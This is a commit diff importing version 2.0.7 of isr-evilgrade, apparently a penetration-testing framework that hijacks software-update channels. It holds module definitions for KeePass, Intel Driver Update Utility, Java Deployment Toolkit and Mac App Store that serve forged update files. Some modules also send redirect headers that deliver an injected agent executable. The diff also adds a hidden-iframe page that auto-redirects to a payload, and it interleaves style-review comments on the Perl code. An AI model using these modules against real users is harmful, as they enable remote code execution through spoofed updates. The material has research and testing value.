Commit d3ed3654 authored by Sophie Brun's avatar Sophie Brun

Imported Upstream version 2.0.7

parent 158e8a6f
Version 2.0.7 - 03-06-2016
--------------------------
- (Samsung SW Update Tool 2.2.5.16) samsung module added
- (Intel Driver Update Utility 2.2.0.5) inteldriver module added
- Keepass CVE-2016-5119, keepass module added
- Lenovo's OEM modules, (lenovo,lenovoapk, lenovofirmware) modules added
- timedoctor module added
Version 2.0.6 - 17-01-2014
--------------------------
-Adding support to Faraday www.faradaysec.com - RPC Api connection
Version 2.0.5 - 06-05-2013
--------------------------
- Adding support for Windows by Elian Gidoni
- sunjava module add Java Security Warning Bypass found by Esteban Guillardoy (__applet_ssv_validated parameter)
- update last version dap module
Version 2.0.4 - 07-11-2011
--------------------------
- sunjava module updated. Support Java <=1.6.0.28
Version 2.0.3 - 18-10-2011
---------------------------
-(Java Deployment Toolkit <= v6.0.240.7 found by Neal Poole) - jdtoolkit module added
Version 2.0.2 - 17-10-2011
---------------------------
- CVE-2011-3230 - (Safari 5.1.1) safari module added
- CVE-2011-3224 - (Mac App Store) appstore module added
Found by Aaron Sigel and Brian Mastenbrook
Version 2.0.1 - 07-07-2011
---------------------------
- MacPorts 1.9.2 (port) module added
Version 2.0.0 - 29-10-2010
---------------------------
......
Elian Gidoni < elian+at+gegidoni+dot+com >,
- Windows support
Leandro Costantino <lcostantino+at+gmail+dot+com>
- Console fixup, modules, DNSSERVER integration, SSL integration
......
To run evilgrade under Windows you should download the last version of Strawberry Perl from:
http://strawberryperl.com/releases.html
......@@ -12,7 +12,7 @@
<MUST>1</MUST>
<CLOSE_DAP>0</CLOSE_DAP>
<FREE_TEXT><%DESCRIPTION%></FREE_TEXT>
<WINDOWSVERSION>492</WINDOWSVERSION>
<WINDOWSVERSION>10492</WINDOWSVERSION>
<Run>1</Run>
</COMPONENT>
<URL><%ENDSITE%></URL>
......
<?xml version=""1.0"" encoding=""utf-8""?>
<Drivers xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns="http://tempuri.org/GetDrivers.xsd">
<Driver>
<Driver_ID>24696</Driver_ID>
<Type>Graphics</Type>
<Status>Active</Status>
<Release_Date>2015-02-04</Release_Date>
<Version>15.28.23.64.4101</Version>
<File_Name>win64_152823.zip</File_Name>
<File_Url>http://storefront.download.protexis.net/24696/a08/win64_152823.zip</File_Url>
<HardwareSignature>VEN_8086&amp;DEV_010A</HardwareSignature>
<IsComponent>true</IsComponent>
<Languages>
<Language>
<Language_Code>en</Language_Code>
<Driver_Name>Intel® HD Graphics Driver for Windows* 7/8/8.1 64-bit</Driver_Name>
<Driver_Details>Installs the Intel® HD Graphics Driver for Windows* 7/8/8.1 64-bit version 15.28.23.64.4101 (9.17.10.4101)</Driver_Details>
</Language>
</Languages>
<Installer_Result_Key>SOFTWARE\Intel\GFX</Installer_Result_Key>
<Installer_Version_Key>SOFTWARE\Intel\GFX</Installer_Version_Key>
<Installer_Reboot_Flag>deferred</Installer_Reboot_Flag>
<Installer_Cmd_Line>-s -overwrite</Installer_Cmd_Line>
</Driver>
</Drivers>
\ No newline at end of file
<html>
<head>
<base href="file://">
</head>
<body>
<iframe src="<%SERVER%>"
width="0" height="0" scrolling="auto" frameborder="1" transparency>
</iframe>
<script>
setTimeout("document.location='<%FILE%>';",8000);
</script>
</body>
</html>
......@@ -200,4 +200,68 @@
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
<mapping>
<version>1.6.0_23</version>
<url>http://java.sun.com/java_update.xml</url>
</mapping>
<mapping>
<version>1.6.0_23</version>
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
<mapping>
<version>1.6.0_24</version>
<url>http://java.sun.com/java_update.xml</url>
</mapping>
<mapping>
<version>1.6.0_24</version>
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
<mapping>
<version>1.6.0_25</version>
<url>http://java.sun.com/java_update.xml</url>
</mapping>
<mapping>
<version>1.6.0_25</version>
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
<mapping>
<version>1.6.0_26</version>
<url>http://java.sun.com/java_update.xml</url>
</mapping>
<mapping>
<version>1.6.0_26</version>
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
<mapping>
<version>1.6.0_27</version>
<url>http://java.sun.com/java_update.xml</url>
</mapping>
<mapping>
<version>1.6.0_27</version>
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
<mapping>
<version>1.6.0_28</version>
<url>http://java.sun.com/java_update.xml</url>
</mapping>
<mapping>
<version>1.6.0_28</version>
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
<mapping>
<version>1.6.0_29</version>
<url>http://java.sun.com/java_update.xml</url>
</mapping>
<mapping>
<version>1.6.0_29</version>
<os>win7, winvista, win2008R2, winlong</os>
<url>http://java.sun.com/java_update_seven.xml</url>
</mapping>
</java-update-map>
......@@ -20,7 +20,6 @@
<jar href="http://java.sun.com/FunnyClass2.jar"/>
</resources>
<application-desc main-class="">
<param name="__applet_ssv_validated" value="true"></param>
</application-desc>
</jnlp>
<installerInformation>
<versionId>14521627</versionId>
<version>99.99.99</version>
<platformFileList>
<platformFile>
<filename>setup-timedoctor-99.99.99-windows.exe</filename>
<platform>windows</platform>
</platformFile>
</platformFileList>
<downloadLocationList>
<downloadLocation>
<url>https://updates.timedoctor.com/download/_production/windows/</url>
</downloadLocation>
</downloadLocationList>
</installerInformation>
\ No newline at end of file
......@@ -51,6 +51,8 @@ sub new {
# running in a terminal, which we aren't during "make test", at
# least on FreeBSD. Suppress warnings here.
local $SIG{__WARN__} = sub { };
# This env setting fixes FD locks in win32 shell.
$ENV{TERM} = 'not dumb' if $^O eq 'MSWin32';
Term::ReadLine->new('shell');
} || undef,
on_signal => 0,
......@@ -147,9 +149,12 @@ sub cmdloop {
if ($pid == 0){ #STDIN thread (child)
close CHILD;
while(1){ #STDIN loop
my $line = $o->readline();
my $line;
if ($^O eq 'MSWin32'){
$line = $o->readline($o->prompt_str);
}else{
$line = $o->readline();
}
print PARENT $line."\n";
exit 0 if $line eq "exit";
}
......@@ -161,7 +166,7 @@ sub cmdloop {
my $hl2 = new IO::Select(\*CHILDM);
#Print Prompt
print "\c[[4m".$o->prompt_str."\c[[0m";
print "\c[[4m".$o->prompt_str."\c[[0m" unless ($^O eq 'MSWin32');
while(1) { #Msg loop
usleep(10000);
#sleep(1); #fix loop cpu usage
......@@ -169,7 +174,7 @@ sub cmdloop {
foreach my $fh (@ready){
my $line = <$fh>;
$o->cmd($line);
print "\c[[4m".$o->prompt_str."\c[[0m" if (!$o->{stop});
print "\c[[4m".$o->prompt_str."\c[[0m" if (!$o->{stop} && !($^O eq 'MSWin32'));
}
my @ready2 = $hl2->can_read(0);
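Review bot: The `$^O eq 'MSWin32'` test is now repeated three times inside cmdloop (the new readline branch, the prompt print guarded with `unless`, and the one guarded with `!($^O eq 'MSWin32')`), and the readline branch duplicates a whole statement only to vary one argument. I would evaluate it once, e.g. `my $is_win32 = ($^O eq 'MSWin32');` near the top of cmdloop, collapse the branch to `my $line = $o->readline($is_win32 ? $o->prompt_str : ());`, and let the last guard read `if (!$o->{stop} && !$is_win32)`. In `new`, `$ENV{TERM} = 'not dumb'` is a plain assignment while the neighbouring `$SIG{__WARN__}` override is `local`; if the setting is only needed for the `Term::ReadLine->new('shell')` call it should be localised the same way, otherwise a comment stating that it is meant to stay set for the whole process (and anything it spawns) would make the intent clear. Both `new` and `cmdloop` continue outside these hunks.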
......
......@@ -30,6 +30,8 @@ use Data::Dump qw(dump);
my $options = {
'port' => { 'val' => 80, 'desc' => 'Webserver listening port'},
'sslport' => { 'val' => 443, 'desc' => 'Webserver SSL listening port'},
'RPCfaraday' => { 'val' => "http://127.0.0.1:9876/", 'desc' => 'Faraday RPC Server'},
'faraday' => { 'val' => 0, 'desc' => 'Enable RPC Faraday connection'},
'debug' => { 'val' => 1, 'desc' => 'Debug mode'},
'DNSPort' => { 'val' => 53, 'desc' => 'Listen Name Server port'},
'DNSEnable' => { 'val' => 1, 'desc' => 'Enable DNS Server ( handle virtual request on modules )'},
......@@ -72,7 +74,7 @@ sub loadmodules{
if (!opendir(DIR,"$path")){
return "[LOADMODULES] - (*) No such file or directory ($path)";
}
my @files = grep(!/^\.\.?$/,readdir(DIR));
my @files = grep(!/(^\.\.?$|^\.svn$)/,readdir(DIR));
closedir(DIR);
my $modules;
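Review bot: The new filter `my @files = grep(!/(^\.\.?$|^\.svn$)/,readdir(DIR));` only blacklists `.svn`, so other non-module entries in the modules directory (`.git`, editor backup files, stray data files) are still returned; what loadmodules does with them is outside the hunk. A positive match on the expected module filename shape, e.g. `my @files = grep { /\A\w+\.pm\z/ } readdir(DIR);`, would be tighter and does not need updating every time a new VCS or tool directory appears, assuming modules are always `.pm` files as the ones added in this commit are. While touching this line, `DIR` is a bareword handle shared across the package; `opendir(my $dh, $path)` with a lexical handle is the modern form. loadmodules continues outside the hunk.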
......
......@@ -33,7 +33,8 @@ use isrcore::ASCIITable;
use isrcore::dnsserver;
#external modules
use Data::Dump qw(dump);
require RPC::XML;
require RPC::XML::Client;
#ignore child's process to avoid zombie
$SIG{CHLD} = 'IGNORE';
......@@ -52,7 +53,7 @@ sub init {
my $isrmain = isrcore::main->new();
if( $shellz::ppid == 0 )
{
$shellz::ppid= getppid();
$shellz::ppid= $$;
}
#Loadmodules
my $ret = $isrmain->loadmodules();
......@@ -63,7 +64,7 @@ sub init {
$self->{'dnsserver'}=$dnsserver;
$self->{'webserver'}=$webserver;
$self->{'isrmain'}=$isrmain;
$self->{'VERSION'}="2.0.0";
$self->{'VERSION'}="2.0.1";
$self->{'path'}="";
$self->{'prompt'}="evilgrade";
$self->{'change'}=0;
......@@ -398,7 +399,7 @@ sub run_restart {
sub run_exit {
my $self = shift;
if( getppid() == $shellz::ppid ){
if( $$ == $shellz::ppid ){
$self->run_stop();
kill KILL => $self->{pid};
$self->{on_signal}=1;
......@@ -440,6 +441,22 @@ sub console_cmd {
if ($file) {
$self->{'webserver'}->{'users'}->{$ip}->{$module}->{'file'}=($tfile) ? "$tfile\n$md5,$sha256,'$cwd',$file" :"$md5,$sha256,'$cwd',$file";
}
#RPC faraday connection
if ($self->{'isrmain'}->{'Base'}->{'options'}->{'faraday'}->{'val'} == 1){
eval {
my $cli = RPC::XML::Client->new($self->{'isrmain'}->{'Base'}->{'options'}->{'RPCfaraday'}->{'val'});
my $resp = $cli->send_request('devlog','Importing evilgrade information');
my $h_id = $cli->send_request('createAndAddHost',$ip,"unknown");
my $var = RPC::XML::array->new("URL-http://github.com/infobyte/evilgrade/");
my $v_id = $cli->send_request('createAndAddVulnToHost',$h_id->value,"Evilgrade injection -".$module,"This ip is interacted with evilgrade framework see the notes inside the host for more information",$var,"HIGH");
#add note host id, note, value
my $n_id = $cli->send_request('createAndAddNoteToHost',$h_id->value,"Evilgrade -".$module,$action) if ($action);
my $n_id2 = $cli->send_request('createAndAddNoteToHost',$h_id->value,"Evilgrade file -".$module,($tfile) ? "$tfile\n$md5,$sha256,'$cwd',$file" :"$md5,$sha256,'$cwd',$file");
}
}
}
##########################################################################
......@@ -452,7 +469,7 @@ sub smry_configure {"Configure <module-name>"}
sub smry_reload {"Reload to update all the modules"}
sub smry_start {"Start webserver"}
sub smry_status {"Get webserver status"}
sub smry_stop {"Stop webserver"}
sub smry_stop {"Stop webserverR"}
sub smry_restart {"Restart webserver"}
sub smry_vhosts {"Show vhosts enable"}
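Review bot: The Faraday export added to console_cmd wraps every RPC call in a bare `eval` and never inspects `$@`, so a refused connection, a bad URL in the `RPCfaraday` option or a fault reply is silently dropped; worse, `$h_id->value` dies inside that eval when `send_request` returns its plain error string instead of an object, which hides the real cause. I would capture the eval's result and `warn` on failure, guard `$h_id` with `ref` before calling `->value`, and rewrite `my $n_id = ... if ($action);` as a plain `if`, since `my` combined with a statement modifier has undefined behaviour in Perl; the `$resp`, `$v_id`, `$n_id` and `$n_id2` results are otherwise unused and can be dropped. console_cmd continues outside the hunk. In the same file, the new summary string `sub smry_stop {"Stop webserverR"}` has a stray trailing `R` and should read `sub smry_stop {"Stop webserver"}`.
```perl
#RPC faraday connection
if ($self->{'isrmain'}->{'Base'}->{'options'}->{'faraday'}->{'val'} == 1){
    my $ok = eval {
        my $cli = RPC::XML::Client->new($self->{'isrmain'}->{'Base'}->{'options'}->{'RPCfaraday'}->{'val'});
        $cli->send_request('devlog','Importing evilgrade information');
        my $h_id = $cli->send_request('createAndAddHost',$ip,"unknown");
        # send_request hands back an error string, not an object, when the call fails
        die "createAndAddHost: $h_id\n" unless ref $h_id;
        # … unchanged: $var and the createAndAddVulnToHost call …
        if ($action) {
            $cli->send_request('createAndAddNoteToHost',$h_id->value,"Evilgrade -".$module,$action);
        }
        # … unchanged: the 'Evilgrade file' createAndAddNoteToHost call …
        1;
    };
    warn "[FARADAY] RPC export failed: $@" unless $ok;
}
```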
......
......@@ -27,7 +27,7 @@ use Data::Dump qw(dump);
my $base=
{
'name' => 'Apple OS X Software',
'name' => 'Apple Windows Update Software',
'version' => '1.0',
'appver' => ' < 2.1.2 (<= Safari 5.0.2 7533.18.5, <= Itunes 10.0.1.22, <= Quicktime 7.6.8 1675)',
'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com>' ],
......
###############
# appstore.pm
#
# Copyright 2010 Francisco Amato
#
# This file is part of isr-evilgrade, www.infobytesec.com .
#
# isr-evilgrade is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 2 of the License.
#
# isr-evilgrade is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with isr-evilgrade; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# '''
##
package modules::appstore;
use strict;
use Data::Dump qw(dump);
use isrcore::utils;
my $base=
{
'name' => 'appstore',
'version' => '1.0',
'appver' => '< Mac OS X v10.6.*',
'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com >' ],
'description' => qq{CVE: CVE-2011-3224 Found By: Aaron Sigel and Brian Mastenbrook
The agent have a modification in Resources/scripts/updatefrontend.py to open a Chess application
look for the comment evilgrade.
The code is execute the next time the user open the help book, more information:
http://vttynotes.blogspot.com/2011/10/cve-2011-3224-mitm-to-rce-with-mac-app.html},
'vh' => '(help.apple.com)',
'request' => [
{
'req' => 'helpbook-version.txt', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '324071169.795686',
'parse' => 0,
'file' => '',
},
{
'req' => '.zip', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' =>1,
'string' => '',
'parse' => 0,
'file' => ''
},
],
#Options
'options' => { 'agent' => { 'val' => './agent/helpbook.zip', 'desc' => 'Agent to inject'},
'enable' => { 'val' => 1,
'desc' => 'Status'},
}
};
##########################################################################
# FUNCTION new
# RECEIVES
# RETURNS
# EXPECTS
# DOES class's constructor
sub new {
my $class = shift;
my $self = { 'Base' => $base, @_ };
return bless $self, $class;
}
1;
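Review bot: The constructor header in this new module (and identically in inteldriver.pm and jdtoolkit.pm) leaves RECEIVES, RETURNS and EXPECTS blank, so the contract of `new` has to be reverse-engineered from the one-line body. I would fill it in along the lines of: receives the class name followed by optional key/value pairs, returns a blessed hashref whose `Base` entry is the module's `$base` descriptor and whose other keys come from the arguments, and expects an even-length argument list. It is also worth stating that `$base` is a single file-scoped hash, so every instance shares the same `Base` data and any option changed through one object is visible to all others, if that sharing is intended. All three files declare `use strict;` without `use warnings;`, and `use isrcore::utils;` in this file and jdtoolkit.pm is not referenced anywhere in the visible code, so it may be a leftover import.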
###############
# inteldriver.pm
#
# Copyright 2010 Francisco Amato
#
# This file is part of isr-evilgrade, www.infobytesec.com .
#
# isr-evilgrade is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 2 of the License.
#
# isr-evilgrade is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with isr-evilgrade; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# '''
##
package modules::inteldriver;
use strict;
use Data::Dump qw(dump);
my $base=
{
'name' => 'inteldriver',
'version' => '1.0',
'appver' => ' <= Intel Driver Update Utility 2.2.0.5',
'author' => [ 'Francisco Amato <famato +[AT]+ infobytesec.com' ],
'description' => qq{CVE: CVE-2016-1493 Found By: Joaquín Rodríguez Varela
The Intel Driver Update Utility [1] is a tool that analyzes the system drivers on your computer.
The utility reports if any new drivers are available, and provides the download files for the driver updates so you can install them quickly and easily.
Intel [2] Driver Update Utility is prone to a Man in The Middle attack which could result in integrity corruption of the transferred data, information leak
and consequently code execution.
https://www.coresecurity.com/advisories/intel-driver-update-utility-mitm},
'vh' => '(storefront.download.protexis.net)',
'request' => [
{
'req' => 'IDDAPI/Prod/productfamily/desktopboard/driver/getbyhardwaresignature/ven_8086&dev_010a/a08/190.xml',
'type' => 'file',
'method' => '',
'bin' => '0',
'string' => '',
'parse' => '1',
'file' => './include/inteldriver/general.xml',
},
{
'req' => '.zip',
'type' => 'agent',
'method' => '',
'bin' => 1,
'string' => '',
'parse' => '0',
'file' => ''
},
],
#Options
'options' => {
'agent' => {
'val' => './agent/agent.zip',
'desc' => 'Agent to inject',
},
'enable' => {
'val' => 1,
'desc' => 'Status'
},
}
};
##########################################################################
# FUNCTION new
# RECEIVES
# RETURNS
# EXPECTS
# DOES class's constructor
sub new {
my $class = shift;
my $self = { 'Base' => $base, @_ };
return bless $self, $class;
}
1;
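Review bot: The author entry `'Francisco Amato <famato +[AT]+ infobytesec.com'` is missing its closing `>`, unlike the same entry in the sibling modules. The request descriptors also mix string and numeric literals for the same fields (`'bin' => '0'` and `'parse' => '1'` in the first entry versus `'bin' => 1` in the second); if the consuming code compares these with `==` the difference is harmless, but using plain numbers throughout, as the first entry's neighbours do, avoids the question.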
###############
# jdtoolkit.pm
#
# Copyright 2011 Francisco Amato
#
# This file is part of isr-evilgrade, www.infobytesec.com .
#
# isr-evilgrade is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 2 of the License.
#
# isr-evilgrade is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with isr-evilgrade; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# '''
##
package modules::jdtoolkit;
use strict;
use Data::Dump qw(dump);
use isrcore::utils;
my $base=
{
'name' => ' Java Deployment Toolkit',
'version' => '1.0',
'appver' => '< v6.0.240.7',
'author' => [ 'Francisco Amato < famato +[AT]+ infobytesec.com >' ],
'description' => qq{Found By: Neal Poole.
The Java Deployment Toolkit Plugin v6.0.240.7 and below for Firefox and Google Chrome can be used to download
and run an improperly signed executable on a target’s system. UAC, if enabled, will prompt the user before
running the executable. This vulnerability has been tested and confirmed to exist on Windows 7, both 32-bit
and 64-bit. It was fixed in Java 7 and Java 6 Update 29.
https://nealpoole.com/blog/2011/10/java-deployment-toolkit-plugin-does-not-validate-installer-executable/},
'vh' => '(java.sun.com)',
'request' => [
{
'req' => '/update.html', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '
<html>
<head>
<title>Java Deployment Toolkit update</title>
</head>
<body>
<script src="http://www.java.com/js/deployJava.js"></script>
<script type="text/javascript">
deployJava.getPlugin().installLatestJRE();
</script>
</body>
</html>
',
'parse' => 0,
'file' => '',
},
{
'req' => '/webapps/download/AutoDL', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' =>1,
'string' => '',
'parse' => 0,
'file' => ''
},
],
#Options
'options' => { 'agent' => { 'val' => './agent/agent.exe', 'desc' => 'Agent to inject'},
'enable' => { 'val' => 1,
'desc' => 'Status'},
}
};
##########################################################################
# FUNCTION new
# RECEIVES
# RETURNS
# EXPECTS
# DOES class's constructor
sub new {
my $class = shift;
my $self = { 'Base' => $base, @_ };
return bless $self, $class;
}
1;
###############
# keepass.pm
#
# Copyright 2016 Matias Ariel Re Medina
#
# This file is part of isr-evilgrade, www.infobytesec.com .
#
# isr-evilgrade is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation version 2 of the License.
#
# isr-evilgrade is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with isr-evilgrade; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# '''
##
package modules::keepass;
use strict;
use Data::Dump qw(dump);
my $base = {
'name' => 'keepass',
'version' => '1.0',
'appver' => 'All',
'author' => ['Matias Ariel Re Medina <mre[at]infobytesec[dot]com>'],
'description' => qq{Keepass updater.},
'vh' => 'keepass.info',
'request' => [
{ 'req' => 'update/version2x.txt.gz', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => '0',
'string' => '',
'parse' => '1',
'file' => '',
'cheader' => "HTTP/1.1 200 OK\r\n"
. "Accept-Ranges: bytes\r\n"
. "Content-Length: 482 \r\n"
. "Connection: close \r\n"
. "Content-Type: text/plain\r\n\r\n"
.":
KeePass:<%VERSION%>
ArcFour Cipher Plugin:2.0.9
CodeWallet3ImportPlugin:1
DataBaseBackup:2.0.8.6
DataBaseReorder:2.0.8
EnableGridLines:1.1
eWallet Liberated Data Importer:0.12
IOProtocolExt:1.12
ITanMaster:2.28.0.2
KdbxLite:1.1
KeeAutoExec:1.8
KeeOldFormatExport:1
KeeResize:1.7
KPScript - Scripting KeePass:2.34
OnScreenKeyboard2:1.2
OtpKeyProv:2.4
PwGen8U:1
PwGenBaliktad:1.2
QR Code Generator:2.0.12
QualityColumn:1.2
Sample Plugin for Developers:2.0.9
SpmImport:1.2
WinKee:2.28.0.1
:",
},
{ 'req' => 'sflogo\.php\?group_id=\d+&type=\d+', #regex friendly
'type' => 'string', #file|string|agent|install
'method' => '', #any
'bin' => 0,
'string' => '',
'parse' => '1',
'file' => '',
'cheader' => "HTTP/1.1 302 Found\r\n"
. "Location: http://keepass.info/<%EXENAME%>.exe \r\n"
. "Content-Length: 0 \r\n"
. "Connection: close \r\n\r\n",
},
{ 'req' => '.exe', #regex friendly
'type' => 'agent', #file|string|agent|install
'method' => '', #any
'bin' => 1,
'string' => '',
'parse' => '0',
'file' => ''
},
],
#Options
'options' => {
'agent' => {
'val' => './agent/agent.exe',
'desc' => 'Agent to inject'
},
'enable' => {
'val' => 1,
'desc' => 'Status'
},
'version' => {
'val' => '3.12',
'desc' => 'Version, has to be older than target. No more than 3 digits.'
},
'exename' => {
'val' => 'KeePass-3.12',
'desc' => 'Zip name'
},
}
};